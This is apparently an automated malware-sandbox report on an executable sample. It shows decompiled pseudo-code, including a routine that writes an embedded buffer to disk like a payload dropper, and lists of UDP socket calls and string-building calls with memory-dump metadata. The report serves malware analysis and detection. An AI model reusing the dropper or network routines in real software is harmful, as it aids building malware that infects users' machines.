                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) + _t65;
                                				 *__eax =  *__eax + __eax;
                                				_t53 = __ebx + 1;
                                				_t72 = _t53 -  *((intOrPtr*)(_t65 + 0x73 + __edx * 2));
                                				if(_t72 < 0) {
                                					L12:
                                					asm("sbb [eax], al");
                                					__setusermatherr(??);
                                					goto L13;
                                				} else {
                                					_pop(_t68);
                                					asm("popad");
                                					asm("insb");
                                					asm("outsw");
                                					asm("outsb");
                                					if(_t72 >= 0) {
                                						L9:
                                						_t32 = E00427E34(_t32, _t55, _t59, _t60, _t62);
                                						goto L10;
                                					} else {
                                						_t68 = _t68 + 1;
                                						if(_t72 >= 0) {
                                							L13:
                                							asm("adc eax, 0x4020c4");
                                							_pop(_t55);
                                							goto L14;
                                						} else {
                                							if(_t72 == 0) {
                                								L14:
                                								_t32 = L00427E1F(_t32, _t55, _t62);
                                								_push(0x40300c);
                                								goto L15;
                                							} else {
                                								if(_t72 < 0) {
                                									L10:
                                									 *_t32 =  *_t32 ^ _t32;
                                									if( *_t32 == 0) {
                                										_push(E00401822);
                                										goto L12;
                                									}
                                									goto L14;
                                								} else {
                                									asm("insb");
                                									if(_t72 == 0) {
                                										asm("bound eax, [esp+esi+0x77]"); // 0x3d660674
                                										_push(__edx);
                                										_t6 = __edi + 0x2e;
                                										 *_t6 =  *(__edi + 0x2e) ^ __eax;
                                										if( *_t6 >= 0) {
                                											_t53 = _t53 + _t53;
                                											 *(_t65 - 4) = _t53;
                                											_t60 = 2;
                                											__set_app_type(__edi);
                                											 *0x403090 =  *0x403090 | 0xffffffff;
                                											 *0x403094 =  *0x403094 | 0xffffffff;
                                											 *(__p__fmode()) =  *0x40308c;
                                											_t50 = __p__commode();
                                											_t55 =  *0x403088;
                                											 *_t50 = _t55;
                                											_t32 =  *_adjust_fdiv;
                                											 *0x403098 = _adjust_fdiv;
                                											goto L9;
                                										}
                                										L15:
                                										_t32 = (_t32 | 0x00000030) + 1;
                                										 *((intOrPtr*)(_t32 + 8)) =  *((intOrPtr*)(_t32 + 8)) + _t55;
                                										 *_t32 =  *_t32 ^ _t32;
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				_t34 = _t32 + _t55;
                                				asm("repne add [eax], al");
                                				 *((intOrPtr*)(_t55 + 0x403084)) =  *((intOrPtr*)(_t55 + 0x403084)) + _t34;
                                				 *((intOrPtr*)(_t65 - 0x6c)) = _t34;
                                				__imp____wgetmainargs(_t65 - 0x60, _t65 - 0x70, _t65 - 0x64,  *0x403080, _t65 - 0x6c);
                                				_push(0x403004);
                                				_push(0x403000);
                                				E00427E19(_t55, _t62);
                                				_t69 = _t68 + 0x24;
                                				_t40 = __imp___wcmdln;
                                				_t63 =  *_t40;
                                				if(_t63 != _t53) {
                                					 *((intOrPtr*)(_t65 - 0x74)) = _t63;
                                					if( *_t63 == 0x22) {
                                						do {
                                							_t63 = _t63 + _t60;
                                							 *((intOrPtr*)(_t65 - 0x74)) = _t63;
                                							_t44 =  *_t63;
                                						} while (_t44 != _t53 && _t44 != 0x22);
                                						if( *_t63 == 0x22) {
                                							L22:
                                							_t63 = _t63 + _t60;
                                							 *((intOrPtr*)(_t65 - 0x74)) = _t63;
                                						}
                                						_t45 =  *_t63;
                                						if(_t45 != _t53 && _t45 <= 0x20) {
                                							goto L22;
                                						}
                                						 *(_t65 - 0x30) = _t53;
                                						_t47 =  *0x68(_t65 - 0x5c);
                                						 *((intOrPtr*)(_t65 + 0x2b0c2444)) =  *((intOrPtr*)(_t65 + 0x2b0c2444)) + _t55;
                                						_t40 = _t47 & 0x0000000c;
                                						_push(_t53);
                                						_push(_t63);
                                						_push(_t60);
                                					}
                                					 *_t40 = _t65;
                                					_t66 = _t40;
                                					_push( *0x4827dc ^ _t66);
                                					 *((intOrPtr*)(_t66 - 0x10)) = _t69;
                                					_push( *((intOrPtr*)(_t66 - 4)));
                                					 *((intOrPtr*)(_t66 - 4)) = 0xffffffff;
                                					_t31 = _t66 - 0xc; // -12
                                					_t43 = _t31;
                                					 *[fs:0x0] = _t43;
                                					return _t43;
                                				} else {
                                					 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
                                					 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0x10));
                                					return _t40;
                                				}
                                			}





















                                0x00427aa6
                                0x00427aa6
                                0x00427aa6
                                0x00427aa6
                                0x00427aa6
                                0x00427aa8
                                0x00427aaa
                                0x00427aac
                                0x00427aae
                                0x00427ab0
                                0x00427ab2
                                0x00427ab4
                                0x00427ab6
                                0x00427ab8
                                0x00427aba
                                0x00427abb
                                0x00427abd
                                0x00427abf
                                0x00427ac1
                                0x00427ac3
                                0x00427ac5
                                0x00427ac7
                                0x00427ac9
                                0x00427acb
                                0x00427acd
                                0x00427acf
                                0x00427ad1
                                0x00427ad3
                                0x00427ad5
                                0x00427ad7
                                0x00427ad9
                                0x00427adb
                                0x00427add
                                0x00427adf
                                0x00427ae1
                                0x00427ae3
                                0x00427ae5
                                0x00427ae7
                                0x00427ae9
                                0x00427aeb
                                0x00427aed
                                0x00427aef
                                0x00427af1
                                0x00427af3
                                0x00427af5
                                0x00427af7
                                0x00427af9
                                0x00427afb
                                0x00427afd
                                0x00427aff
                                0x00427b01
                                0x00427b03
                                0x00427b05
                                0x00427b07
                                0x00427b09
                                0x00427b0b
                                0x00427b0d
                                0x00427b0f
                                0x00427b11
                                0x00427b13
                                0x00427b15
                                0x00427b17
                                0x00427b19
                                0x00427b1b
                                0x00427b1d
                                0x00427b1f
                                0x00427b21
                                0x00427b23
                                0x00427b25
                                0x00427b27
                                0x00427b29
                                0x00427b2b
                                0x00427b2d
                                0x00427b2f
                                0x00427b31
                                0x00427b33
                                0x00427b35
                                0x00427b37
                                0x00427b39
                                0x00427b3b
                                0x00427b3d
                                0x00427b3f
                                0x00427b41
                                0x00427b43
                                0x00427b45
                                0x00427b47
                                0x00427b49
                                0x00427b4b
                                0x00427b4d
                                0x00427b4f
                                0x00427b51
                                0x00427b53
                                0x00427b55
                                0x00427b57
                                0x00427b59
                                0x00427b5b
                                0x00427b5d
                                0x00427b5f
                                0x00427b61
                                0x00427b63
                                0x00427b65
                                0x00427b67
                                0x00427b69
                                0x00427b6b
                                0x00427b6d
                                0x00427b6f
                                0x00427b71
                                0x00427b73
                                0x00427b75
                                0x00427b77
                                0x00427b79
                                0x00427b7b
                                0x00427b7d
                                0x00427b7f
                                0x00427b81
                                0x00427b83
                                0x00427b85
                                0x00427b87
                                0x00427b89
                                0x00427b8b
                                0x00427b8d
                                0x00427b8f
                                0x00427b91
                                0x00427b93
                                0x00427b95
                                0x00427b97
                                0x00427b99
                                0x00427b9b
                                0x00427b9d
                                0x00427b9f
                                0x00427ba1
                                0x00427ba3
                                0x00427ba5
                                0x00427ba7
                                0x00427ba9
                                0x00427bab
                                0x00427bad
                                0x00427baf
                                0x00427bb1
                                0x00427bb3
                                0x00427bb5
                                0x00427bb7
                                0x00427bb9
                                0x00427bbb
                                0x00427bbd
                                0x00427bbf
                                0x00427bc1
                                0x00427bc3
                                0x00427bc5
                                0x00427bc7
                                0x00427bc9
                                0x00427bcb
                                0x00427bcd
                                0x00427bcf
                                0x00427bd1
                                0x00427bd3
                                0x00427bd5
                                0x00427bd7
                                0x00427bd9
                                0x00427bdb
                                0x00427bdd
                                0x00427bdf
                                0x00427be1
                                0x00427be3
                                0x00427be5
                                0x00427be7
                                0x00427be9
                                0x00427beb
                                0x00427bed
                                0x00427bef
                                0x00427bf1
                                0x00427bf3
                                0x00427bf5
                                0x00427bf7
                                0x00427bf9
                                0x00427bfb
                                0x00427bfd
                                0x00427bff
                                0x00427c01
                                0x00427c03
                                0x00427c05
                                0x00427c07
                                0x00427c09
                                0x00427c0b
                                0x00427c0d
                                0x00427c0f
                                0x00427c11
                                0x00427c13
                                0x00427c15
                                0x00427c17
                                0x00427c19
                                0x00427c1b
                                0x00427c1d
                                0x00427c1f
                                0x00427c21
                                0x00427c23
                                0x00427c25
                                0x00427c27
                                0x00427c29
                                0x00427c2b
                                0x00427c2d
                                0x00427c2f
                                0x00427c31
                                0x00427c33
                                0x00427c35
                                0x00427c37
                                0x00427c39
                                0x00427c3b
                                0x00427c3d
                                0x00427c3f
                                0x00427c41
                                0x00427c43
                                0x00427c45
                                0x00427c47
                                0x00427c49
                                0x00427c4b
                                0x00427c4d
                                0x00427c4f
                                0x00427c51
                                0x00427c53
                                0x00427c55
                                0x00427c57
                                0x00427c59
                                0x00427c5b
                                0x00427c5d
                                0x00427c5f
                                0x00427c61
                                0x00427c63
                                0x00427c65
                                0x00427c67
                                0x00427c69
                                0x00427c6b
                                0x00427c6d
                                0x00427c6f
                                0x00427c71
                                0x00427c73
                                0x00427c75
                                0x00427c77
                                0x00427c79
                                0x00427c7b
                                0x00427c7d
                                0x00427c7f
                                0x00427c81
                                0x00427c83
                                0x00427c85
                                0x00427c87
                                0x00427c89
                                0x00427c8c
                                0x00427c8e
                                0x00427c8f
                                0x00427c93
                                0x00427d09
                                0x00427d09
                                0x00427d0c
                                0x00000000
                                0x00427c96
                                0x00427c96
                                0x00427c97
                                0x00427c98
                                0x00427c99
                                0x00427c9b
                                0x00427c9c
                                0x00427cfa
                                0x00427cfa
                                0x00000000
                                0x00427c9e
                                0x00427c9e
                                0x00427c9f
                                0x00427d0d
                                0x00427d0d
                                0x00427d12
                                0x00000000
                                0x00427ca2
                                0x00427ca2
                                0x00427d13
                                0x00427d13
                                0x00427d18
                                0x00000000
                                0x00427ca4
                                0x00427ca4
                                0x00427d02
                                0x00427d02
                                0x00427d05
                                0x00427d07
                                0x00000000
                                0x00427d07
                                0x00000000
                                0x00427ca6
                                0x00427ca6
                                0x00427ca7
                                0x00427ca9
                                0x00427cad
                                0x00427cae
                                0x00427cae
                                0x00427cb1
                                0x00427cb4
                                0x00427cb6
                                0x00427cbb
                                0x00427cbd
                                0x00427cc4
                                0x00427ccb
                                0x00427cde
                                0x00427ce0
                                0x00427ce6
                                0x00427cec
                                0x00427cf3
                                0x00427cf5
                                0x00000000
                                0x00427cf5
                                0x00427d19
                                0x00427d1b
                                0x00427d1c
                                0x00427d1f
                                0x00427d1f
                                0x00427ca7
                                0x00427ca4
                                0x00427ca2
                                0x00427c9f
                                0x00427c9c
                                0x00427d21
                                0x00427d23
                                0x00427d26
                                0x00427d2c
                                0x00427d45
                                0x00427d4b
                                0x00427d50
                                0x00427d55
                                0x00427d5a
                                0x00427d5d
                                0x00427d62
                                0x00427d66
                                0x00427d7b
                                0x00427d82
                                0x00427d84
                                0x00427d84
                                0x00427d86
                                0x00427d89
                                0x00427d8c
                                0x00427d9b
                                0x00427d9d
                                0x00427d9d
                                0x00427d9f
                                0x00427d9f
                                0x00427da2
                                0x00427da8
                                0x00000000
                                0x00000000
                                0x00427db0
                                0x00427db7
                                0x00427dbd
                                0x00427dc3
                                0x00427dc6
                                0x00427dc7
                                0x00427dc8
                                0x00427dc8
                                0x00427dc9
                                0x00427dcb
                                0x00427dd4
                                0x00427dd5
                                0x00427dd8
                                0x00427ddb
                                0x00427de2
                                0x00427de2
                                0x00427de5
                                0x00427deb
                                0x00427d68
                                0x00427d68
                                0x00427d6f
                                0x00427d7a
                                0x00427d7a

                                APIs
                                Strings
                                • C:\Users\user\Desktop\lzxbD4wR0g.exe, xrefs: 00427C8E
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: __p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                • String ID: C:\Users\user\Desktop\lzxbD4wR0g.exe
                                • API String ID: 3842468306-3170246852
                                • Opcode ID: 919017c225be44aac207cd71269e1722cf6032aa33ea8b5cececcb42194a64b1
                                • Instruction ID: 2e7c3de901e816a637cc3967298db82e0c374358e8d626ca6d4bd423ebefed7b
                                • Opcode Fuzzy Hash: 919017c225be44aac207cd71269e1722cf6032aa33ea8b5cececcb42194a64b1
                                • Instruction Fuzzy Hash: C821E17260A3109FC715DFA4FE4A9A97F38FB06315B20416FE601A72E1C7385A00CB2C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • socket.WS2_32(00000002,00000002,00000011), ref: 02206F1C
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02206F7A
                                • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 02207052
                                • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02207081
                                • closesocket.WS2_32(?), ref: 02207185
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: closesocketrecvfromselectsendtosocket
                                • String ID: @
                                • API String ID: 4198204009-2766056989
                                • Opcode ID: cdc08953012da39c88bca336bcfb4af67f0096b965f4a70ae719f5afd6546d1d
                                • Instruction ID: 85f76d0c2d34f8f9aed71244e0ce4cc05cef04b331103d43f32366316ad763d9
                                • Opcode Fuzzy Hash: cdc08953012da39c88bca336bcfb4af67f0096b965f4a70ae719f5afd6546d1d
                                • Instruction Fuzzy Hash: 53718E71D142699AEB38CBA4CC94BE9B375BF08344F1041E9E29DA61C9CBB06ED4CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • socket.WS2_32(00000002,00000002,00000011), ref: 02207580
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 022075D1
                                • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 022076A9
                                • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 022076D8
                                • closesocket.WS2_32(000000FF), ref: 02207768
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: closesocketrecvfromselectsendtosocket
                                • String ID: @
                                • API String ID: 4198204009-2766056989
                                • Opcode ID: a34b0a1ce3829f82490bdc7c9b33689f39d1b42c8d2762d71179c2b91e25fb6e
                                • Instruction ID: a8422d5ba426e73cc1a6dc38cd020d6c7023117a2c736bb6beabb49dbfef5571
                                • Opcode Fuzzy Hash: a34b0a1ce3829f82490bdc7c9b33689f39d1b42c8d2762d71179c2b91e25fb6e
                                • Instruction Fuzzy Hash: 19517B74D142699BEF28CB94CC94BE9B7B5AB05340F5081D9E29EA72C5CBB06EC4CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E02210C4B(CHAR* _a4) {
                                				void* _v8;
                                				long _v12;
                                				long _t19;
                                				void* _t32;
                                
                                				_v12 = 0;
                                				_v12 = 0;
                                				while(1) {
                                					_push(_a4);
                                					if(_v12 >=  *0x21e114c()) {
                                						break;
                                					}
                                					if(_a4[_v12] != 0x20) {
                                						_v12 = _v12 + 1;
                                						continue;
                                					}
                                					return 0;
                                				}
                                				_v8 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x22, 0);
                                				if(_v8 == 0xffffffff) {
                                					return 0;
                                				}
                                				_t19 =  *0x2287d98; // 0x1e200
                                				_t32 =  *0x2287d9c; // 0x51e930
                                				WriteFile(_v8, _t32, _t19,  &_v12, 0);
                                				CloseHandle(_v8);
                                				if(GetFileAttributesA(_a4) != 0xffffffff) {
                                					return 1;
                                				}
                                				return 0;
                                			}







                                0x02210c51
                                0x02210c58
                                0x02210c6a
                                0x02210c6d
                                0x02210c77
                                0x00000000
                                0x00000000
                                0x02210c85
                                0x02210c67
                                0x00000000
                                0x02210c67
                                0x00000000
                                0x02210c87
                                0x02210ca6
                                0x02210cad
                                0x00000000
                                0x02210cf0
                                0x02210cb5
                                0x02210cbb
                                0x02210cc6
                                0x02210cd0
                                0x02210ce3
                                0x00000000
                                0x02210ce9
                                0x00000000

                                APIs
                                • lstrlen.KERNEL32(?), ref: 02210C6E
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 02210CA0
                                • WriteFile.KERNEL32(?,0051E930,0001E200,?,00000000), ref: 02210CC6
                                • CloseHandle.KERNEL32(?), ref: 02210CD0
                                • GetFileAttributesA.KERNEL32(?), ref: 02210CDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$AttributesCloseCreateHandleWritelstrlen
                                • String ID: 0Q
                                • API String ID: 96072700-1780094543
                                • Opcode ID: 660408dca0de7c37fb39a32bfb356ec05f88edf60006c983b8aaded530c20ffe
                                • Instruction ID: 923f395de1e27e1e0b93a9991d376ceaa92a635a98b3f18932a4a3c0b68e6d3d
                                • Opcode Fuzzy Hash: 660408dca0de7c37fb39a32bfb356ec05f88edf60006c983b8aaded530c20ffe
                                • Instruction Fuzzy Hash: B8117C74A60208FBCB10CFE4DC88F9E7BF5AB48311F208A54F909DA284D7709AD4CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 02212A4E
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • lstrcat.KERNEL32(00000000,02203DE0), ref: 02212A7C
                                • lstrcat.KERNEL32(00000000,02203DE4), ref: 02212AA2
                                • lstrcat.KERNEL32(00000000,02203DE8), ref: 02212AB1
                                • lstrlen.KERNEL32(00000000), ref: 02212B0C
                                • lstrcat.KERNEL32(00000000,02203DEC), ref: 02212B40
                                • lstrcat.KERNEL32(00000000,02203DF0), ref: 02212B66
                                • lstrcat.KERNEL32(00000000,02203DF4), ref: 02212B83
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
